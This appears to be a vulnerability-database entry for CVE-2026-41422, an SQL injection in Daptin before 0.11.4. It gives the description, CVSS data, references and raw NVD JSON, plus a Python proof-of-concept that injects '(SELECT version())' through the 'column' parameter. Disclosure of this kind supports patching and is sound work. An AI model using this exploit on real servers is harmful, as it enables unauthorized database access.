CVE-2026-41422

Description

Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.4, the /aggregate/:typename endpoint accepted column and group query parameters that were passed verbatim to goqu.L() — a raw SQL literal expression builder — without any validation. This bypassed all parameterization and allowed authenticated users with any valid session to inject arbitrary SQL expressions. This issue has been patched in version 0.11.4.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Daptin < 0.11.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-41422
# Target: Daptin < 0.11.4
# Description: SQL Injection via /aggregate/:typename endpoint

target_url = "http://target-domain.com/aggregate/users"

# Malicious payload to inject raw SQL via the 'column' parameter
# Example: attempting to extract database version
payload = "1,(SELECT version())"

params = {
    "column": payload
}

# Authentication is required (PR:L)
cookies = {
    "session": "valid_low_privilege_session_cookie"
}

try:
    response = requests.get(target_url, params=params, cookies=cookies)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response for SQL output.")
        print(response.text)
    else:
        print("[-] Request failed")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41422
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41422
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41422/
[4] VulDB https://vuldb.com/cve/CVE-2026-41422
[5] https://github.com/daptin/daptin/releases/tag/v0.11.4
[6] https://github.com/daptin/daptin/security/advisories/GHSA-rw2c-8rfq-gwfv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41422", "sourceIdentifier": "[email protected]", "published": "2026-05-07T15:16:06.813", "lastModified": "2026-05-07T15:47:46.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.4, the /aggregate/:typename endpoint accepted column and group query parameters that were passed verbatim to goqu.L() — a raw SQL literal expression builder — without any validation. This bypassed all parameterization and allowed authenticated users with any valid session to inject arbitrary SQL expressions. This issue has been patched in version 0.11.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/daptin/daptin/releases/tag/v0.11.4", "source": "[email protected]"}, {"url": "https://github.com/daptin/daptin/security/advisories/GHSA-rw2c-8rfq-gwfv", "source": "[email protected]"}]}}